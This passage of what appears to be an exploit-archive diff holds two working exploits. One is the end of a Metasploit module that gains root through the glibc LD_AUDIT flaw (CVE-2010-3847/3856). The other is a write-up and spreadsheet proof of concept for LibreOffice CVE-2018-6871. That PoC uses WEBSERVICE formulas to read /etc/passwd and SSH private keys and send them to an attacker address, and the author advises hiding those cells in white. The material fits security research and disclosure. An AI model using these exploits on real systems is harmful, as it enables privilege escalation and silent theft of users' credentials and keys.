'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
|
||||
[ 'Linux x64', { 'Arch' => ARCH_X64 } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-3847' ],
|
||||
[ 'CVE', '2010-3856' ],
|
||||
[ 'BID', '44154' ],
|
||||
[ 'BID', '44347' ],
|
||||
[ 'EDB', '15274' ],
|
||||
[ 'EDB', '15304' ],
|
||||
[ 'EDB', '18105' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/344' ],
|
||||
[ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ],
|
||||
[ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ],
|
||||
[ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3856' ],
|
||||
[ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ],
|
||||
[ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3856' ]
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/bin/ping' ]),
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||
])
|
||||
end
|
||||
|
||||
def base_dir
|
||||
datastore['WritableDir']
|
||||
end
|
||||
|
||||
def suid_exe_path
|
||||
datastore['SUID_EXECUTABLE']
|
||||
end
|
||||
|
||||
def check
|
||||
glibc_banner = cmd_exec 'ldd --version'
|
||||
glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
|
||||
if glibc_version.to_s.eql? ''
|
||||
vprint_error 'Could not determine the GNU C library version'
|
||||
return CheckCode::Safe
|
||||
elsif glibc_version >= Gem::Version.new('2.12.2') ||
|
||||
(glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12'))
|
||||
vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good "GNU C Library version #{glibc_version} is vulnerable"
|
||||
|
||||
lib = 'libpcprofile.so'
|
||||
@lib_dir = nil
|
||||
vprint_status "Checking for #{lib} in system search paths"
|
||||
search_paths = cmd_exec "env -i LD_PRELOAD=#{rand_text_alpha rand(10..15)} LD_DEBUG=libs env 2>&1 | grep 'search path='"
|
||||
search_paths.split('path=')[1..-1].join.split(':').each do |path|
|
||||
lib_dir = path.to_s.strip
|
||||
next if lib_dir.eql? ''
|
||||
libs = cmd_exec "ls '#{lib_dir}'"
|
||||
if libs.include? lib
|
||||
@lib_dir = lib_dir
|
||||
break
|
||||
end
|
||||
end
|
||||
if @lib_dir.nil?
|
||||
vprint_error "Could not find #{lib}"
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good "Found #{lib} in #{@lib_dir}"
|
||||
|
||||
unless setuid? suid_exe_path
|
||||
vprint_error "#{suid_exe_path} is not setuid"
|
||||
return CheckCode::Detected
|
||||
end
|
||||
vprint_good "#{suid_exe_path} is setuid"
|
||||
|
||||
CheckCode::Appears
|
||||
end
|
||||
|
||||
def upload_and_chmodx(path, data)
|
||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||
rm_f path
|
||||
write_file path, data
|
||||
cmd_exec "chmod +x '#{path}'"
|
||||
register_file_for_cleanup path
|
||||
end
|
||||
|
||||
def on_new_session(client)
|
||||
# remove root owned shared object from system load path
|
||||
if client.type.eql? 'meterpreter'
|
||||
client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
|
||||
client.fs.file.rm @so_path
|
||||
else
|
||||
client.shell_command_token "rm #{@so_path}"
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
check_status = check
|
||||
|
||||
if check_status == CheckCode::Appears
|
||||
print_good 'The target appears to be vulnerable'
|
||||
elsif check_status == CheckCode::Detected
|
||||
fail_with Failure::BadConfig, "#{suid_exe_path} is not suid"
|
||||
else
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
payload_path = "#{base_dir}/#{payload_name}"
|
||||
|
||||
# Set target
|
||||
uname = cmd_exec 'uname -m'
|
||||
vprint_status "System architecture is #{uname}"
|
||||
if target.name.eql? 'Automatic'
|
||||
case uname
|
||||
when 'x86_64'
|
||||
my_target = targets[2]
|
||||
when /x86/, /i\d86/
|
||||
my_target = targets[1]
|
||||
else
|
||||
fail_with Failure::NoTarget, 'Unable to automatically select a target'
|
||||
end
|
||||
else
|
||||
my_target = target
|
||||
end
|
||||
print_status "Using target: #{my_target.name}"
|
||||
|
||||
cpu = nil
|
||||
case my_target['Arch']
|
||||
when ARCH_X86
|
||||
cpu = Metasm::Ia32.new
|
||||
when ARCH_X64
|
||||
cpu = Metasm::X86_64.new
|
||||
else
|
||||
fail_with Failure::NoTarget, 'Target is not compatible'
|
||||
end
|
||||
|
||||
# Compile shared object
|
||||
so_stub = %|
|
||||
extern int setuid(int);
|
||||
extern int setgid(int);
|
||||
extern int system(const char *__s);
|
||||
|
||||
void init(void) __attribute__((constructor));
|
||||
|
||||
void __attribute__((constructor)) init() {
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
system("#{payload_path}");
|
||||
}
|
||||
|
|
||||
|
||||
begin
|
||||
so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
|
||||
rescue
|
||||
print_error "Metasm encoding failed: #{$ERROR_INFO}"
|
||||
elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
|
||||
elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
|
||||
fail_with Failure::Unknown, 'Metasm encoding failed'
|
||||
end
|
||||
|
||||
# Upload shared object
|
||||
so_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
so_path = "#{base_dir}/#{so_name}"
|
||||
upload_and_chmodx so_path, so
|
||||
|
||||
# Upload exploit
|
||||
@so_path = "#{@lib_dir}/#{so_name}.so"
|
||||
exp = %(
|
||||
umask 0
|
||||
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="#{@so_path}" #{suid_exe_path} 2>/dev/null
|
||||
umask 0022
|
||||
cat #{so_path} > #{@so_path}
|
||||
LD_AUDIT="#{so_name}.so" #{suid_exe_path}
|
||||
echo > #{@so_path}
|
||||
)
|
||||
exp_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
exp_path = "#{base_dir}/#{exp_name}"
|
||||
upload_and_chmodx exp_path, exp
|
||||
|
||||
# Upload payload
|
||||
upload_and_chmodx payload_path, generate_payload_exe
|
||||
|
||||
# Launch exploit
|
||||
print_status 'Launching exploit...'
|
||||
# The echo at the end of the command is required
|
||||
# else the original session may die
|
||||
output = cmd_exec "#{exp_path}& echo "
|
||||
output.each_line { |line| vprint_status line.chomp }
|
||||
end
|
||||
end
|
396
exploits/linux/remote/44022.md
Normal file
396
exploits/linux/remote/44022.md
Normal file
|
@ -0,0 +1,396 @@
|
|||
# Vulnerability description
|
||||
|
||||
[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)
|
||||
|
||||
## First part
|
||||
|
||||
LibreOffice supports COM.MICROSOFT.WEBSERVICE function:
|
||||
|
||||
https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4
|
||||
|
||||
The function is required to obtain data by URL, usually used as:
|
||||
|
||||
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")
|
||||
|
||||
In original:
|
||||
|
||||
For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.
|
||||
|
||||
In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.
|
||||
|
||||
## Second part
|
||||
|
||||
By default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.
|
||||
|
||||
# Exploitation
|
||||
|
||||
To read file you need just:
|
||||
|
||||
=WEBSERVICE("/etc/passwd")
|
||||
|
||||
This function can also be used to send a file:
|
||||
|
||||
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))
|
||||
|
||||
For successful operation, you need to send the files of the current user, so you need to retrieve current user home path.
|
||||
|
||||
=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",
|
||||
|
||||
Also you can parse other files too, like a ~/.ssh/config or something like that.
|
||||
|
||||
For other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).
|
||||
|
||||
# Impact
|
||||
|
||||
It is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO.
|
||||
|
||||
# Acknowledgment
|
||||
|
||||
Vulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes).
|
||||
|
||||
- - -
|
||||
|
||||
# poc.fods
|
||||
|
||||
```
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
|
||||
<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:presentation="urn:oasis:names:tc:opendocument:xmlns:presentation:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.spreadsheet">
|
||||
<office:automatic-styles>
|
||||
<style:style style:name="co1" style:family="table-column">
|
||||
<style:table-column-properties fo:break-before="auto" style:column-width="73.3pt"/>
|
||||
</style:style>
|
||||
<style:style style:name="co2" style:family="table-column">
|
||||
<style:table-column-properties fo:break-before="auto" style:column-width="75.66pt"/>
|
||||
</style:style>
|
||||
<style:style style:name="co3" style:family="table-column">
|
||||
<style:table-column-properties fo:break-before="auto" style:column-width="173.14pt"/>
|
||||
</style:style>
|
||||
<style:style style:name="co4" style:family="table-column">
|
||||
<style:table-column-properties fo:break-before="auto" style:column-width="64.01pt"/>
|
||||
</style:style>
|
||||
<style:style style:name="co5" style:family="table-column">
|
||||
<style:table-column-properties fo:break-before="auto" style:column-width="420.94pt"/>
|
||||
</style:style>
|
||||
<style:style style:name="co6" style:family="table-column">
|
||||
<style:table-column-properties fo:break-before="auto" style:column-width="105.19pt"/>
|
||||
</style:style>
|
||||
<style:style style:name="ro1" style:family="table-row">
|
||||
<style:table-row-properties style:row-height="12.81pt" fo:break-before="auto" style:use-optimal-row-height="true"/>
|
||||
</style:style>
|
||||
<style:style style:name="ro2" style:family="table-row">
|
||||
<style:table-row-properties style:row-height="126.74pt" fo:break-before="auto" style:use-optimal-row-height="false"/>
|
||||
</style:style>
|
||||
<style:style style:name="ro3" style:family="table-row">
|
||||
<style:table-row-properties style:row-height="135.81pt" fo:break-before="auto" style:use-optimal-row-height="true"/>
|
||||
</style:style>
|
||||
<style:style style:name="ta1" style:family="table" style:master-page-name="Default">
|
||||
<style:table-properties table:display="true" style:writing-mode="lr-tb"/>
|
||||
</style:style>
|
||||
<style:style style:name="ce1" style:family="table-cell" style:parent-style-name="Default" style:data-style-name="N0"/>
|
||||
<style:style style:name="ce2" style:family="table-cell" style:parent-style-name="Default">
|
||||
<style:text-properties style:use-window-font-color="true"/>
|
||||
</style:style>
|
||||
<style:style style:name="ce5" style:family="table-cell" style:parent-style-name="Default">
|
||||
<style:table-cell-properties fo:background-color="#f3715a"/>
|
||||
</style:style>
|
||||
<style:page-layout style:name="pm1">
|
||||
<style:page-layout-properties style:writing-mode="lr-tb"/>
|
||||
<style:header-style>
|
||||
<style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-bottom="7.09pt"/>
|
||||
</style:header-style>
|
||||
<style:footer-style>
|
||||
<style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-top="7.09pt"/>
|
||||
</style:footer-style>
|
||||
</style:page-layout>
|
||||
<style:page-layout style:name="pm2">
|
||||
<style:page-layout-properties style:writing-mode="lr-tb"/>
|
||||
<style:header-style>
|
||||
<style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-bottom="7.09pt" fo:border="2.49pt solid #000000" fo:padding="0.51pt" fo:background-color="#c0c0c0">
|
||||
<style:background-image/>
|
||||
</style:header-footer-properties>
|
||||
</style:header-style>
|
||||
<style:footer-style>
|
||||
<style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-top="7.09pt" fo:border="2.49pt solid #000000" fo:padding="0.51pt" fo:background-color="#c0c0c0">
|
||||
<style:background-image/>
|
||||
</style:header-footer-properties>
|
||||
</style:footer-style>
|
||||
</style:page-layout>
|
||||
</office:automatic-styles>
|
||||
<office:body>
|
||||
<office:spreadsheet>
|
||||
<table:calculation-settings table:automatic-find-labels="false" table:use-regular-expressions="false" table:use-wildcards="true"/>
|
||||
<table:table table:name="Sheet1" table:style-name="ta1">
|
||||
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
|
||||
<table:table-column table:style-name="co2" table:default-cell-style-name="Default"/>
|
||||
<table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
|
||||
<table:table-column table:style-name="co4" table:number-columns-repeated="2" table:default-cell-style-name="Default"/>
|
||||
<table:table-column table:style-name="co5" table:default-cell-style-name="Default"/>
|
||||
<table:table-column table:style-name="co4" table:number-columns-repeated="2" table:default-cell-style-name="Default"/>
|
||||
<table:table-column table:style-name="co6" table:default-cell-style-name="Default"/>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell office:value-type="string" calcext:value-type="string">
|
||||
<text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:number-columns-repeated="8"/>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell table:number-columns-repeated="9"/>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro2">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="string" calcext:value-type="string">
|
||||
<text:p>Current user:</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:style-name="ce1" table:formula="of:="/home/" & MID(COM.MICROSOFT.WEBSERVICE("/proc/self/environ"); FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ")) + LEN("USER="); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE("/proc/self/environ"); FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ")))-FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ"))-LEN("USER=")) & "/"" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:style-name="ce2" table:formula="of:=FIND(":"; [.F3]; [.E3])" office:value-type="float" office:value="689" calcext:value-type="float">
|
||||
<text:p>689</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:style-name="ce2" table:formula="of:=FIND("/home"; [.F3]; FIND(":x:1000:1000:"; [.F3]))" office:value-type="float" office:value="676" calcext:value-type="float">
|
||||
<text:p>676</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:style-name="ce2" table:formula="of:=COM.MICROSOFT.WEBSERVICE("/etc/passwd")" office:value-type="string" office:string-value="" calcext:value-type="string">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell/>
|
||||
<table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string"><text:p>(change this)</text:p><text:p>Address:</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string">
|
||||
<text:p>http://localhost:8080</text:p>
|
||||
</table:table-cell>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro3">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="string" calcext:value-type="string">
|
||||
<text:p>List of private keys:</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:style-name="ce1"/>
|
||||
<table:table-cell table:number-columns-repeated="2"/>
|
||||
<table:table-cell table:formula="of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & "/.ssh/config"); "~"; [.C3])" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="string" calcext:value-type="string">
|
||||
<text:p>Send:</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell/>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="string" calcext:value-type="string">
|
||||
<text:p>0 (default path)</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=[.C3] & "/.ssh/id_rsa"" office:value-type="string" office:string-value="" calcext:value-type="string">
|
||||
<text:p></text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:number-columns-repeated="5"/>
|
||||
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C5]))" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="float" office:value="1" calcext:value-type="float">
|
||||
<text:p>1</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])" office:value-type="string" office:string-value="" calcext:value-type="string">
|
||||
<text:p></text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F6])" office:value-type="float" office:value="132" calcext:value-type="float">
|
||||
<text:p>132</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=[.F6]+LEN("IdentityFile ")" office:value-type="float" office:value="109" calcext:value-type="float">
|
||||
<text:p>109</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.F4])" office:value-type="float" office:value="96" calcext:value-type="float">
|
||||
<text:p>96</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:number-columns-repeated="2"/>
|
||||
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C6]))" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="float" office:value="2" calcext:value-type="float">
|
||||
<text:p>2</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])" office:value-type="string" office:string-value="" calcext:value-type="string">
|
||||
<text:p></text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F7])" office:value-type="float" office:value="297" calcext:value-type="float">
|
||||
<text:p>297</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=[.F7]+LEN("IdentityFile ")" office:value-type="float" office:value="259" calcext:value-type="float">
|
||||
<text:p>259</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F6];1))" office:value-type="float" office:value="246" calcext:value-type="float">
|
||||
<text:p>246</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:number-columns-repeated="2"/>
|
||||
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C7]))" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="float" office:value="3" calcext:value-type="float">
|
||||
<text:p>3</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])" office:value-type="string" office:string-value="" calcext:value-type="string">
|
||||
<text:p></text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F8])" office:value-type="float" office:value="436" calcext:value-type="float">
|
||||
<text:p>436</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=[.F8]+LEN("IdentityFile ")" office:value-type="float" office:value="409" calcext:value-type="float">
|
||||
<text:p>409</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F7];1))" office:value-type="float" office:value="396" calcext:value-type="float">
|
||||
<text:p>396</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:number-columns-repeated="2"/>
|
||||
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C8]))" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="float" office:value="4" calcext:value-type="float">
|
||||
<text:p>4</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])" office:value-type="string" office:string-value="" calcext:value-type="string">
|
||||
<text:p></text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F9])" office:value-type="float" office:value="586" calcext:value-type="float">
|
||||
<text:p>586</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=[.F9]+LEN("IdentityFile ")" office:value-type="float" office:value="563" calcext:value-type="float">
|
||||
<text:p>563</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F8];1))" office:value-type="float" office:value="550" calcext:value-type="float">
|
||||
<text:p>550</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:number-columns-repeated="2"/>
|
||||
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C9]))" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="float" office:value="5" calcext:value-type="float">
|
||||
<text:p>5</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])" office:value-type="string" office:string-value="" calcext:value-type="string">
|
||||
<text:p></text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F10])" office:value-type="float" office:value="718" calcext:value-type="float">
|
||||
<text:p>718</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=[.F10]+LEN("IdentityFile ")" office:value-type="float" office:value="695" calcext:value-type="float">
|
||||
<text:p>695</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F9];1))" office:value-type="float" office:value="682" calcext:value-type="float">
|
||||
<text:p>682</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:number-columns-repeated="2"/>
|
||||
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C10]))" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="float" office:value="6" calcext:value-type="float">
|
||||
<text:p>6</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=MID([.$F$4]; [.E11]; [.D11]-[.E11])" office:value-type="string" office:string-value="" calcext:value-type="string">
|
||||
<text:p></text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F11])" office:value-type="float" office:value="882" calcext:value-type="float">
|
||||
<text:p>882</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=[.F11]+LEN("IdentityFile ")" office:value-type="float" office:value="860" calcext:value-type="float">
|
||||
<text:p>860</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F10];1))" office:value-type="float" office:value="847" calcext:value-type="float">
|
||||
<text:p>847</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:number-columns-repeated="2"/>
|
||||
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C11]))" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="float" office:value="7" calcext:value-type="float">
|
||||
<text:p>7</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])" office:value-type="string" office:string-value="" calcext:value-type="string">
|
||||
<text:p></text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F12])" office:value-type="float" office:value="1267" calcext:value-type="float">
|
||||
<text:p>1267</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=[.F12]+LEN("IdentityFile ")" office:value-type="float" office:value="1240" calcext:value-type="float">
|
||||
<text:p>1240</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F11];1))" office:value-type="float" office:value="1227" calcext:value-type="float">
|
||||
<text:p>1227</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:number-columns-repeated="2"/>
|
||||
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C12]))" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
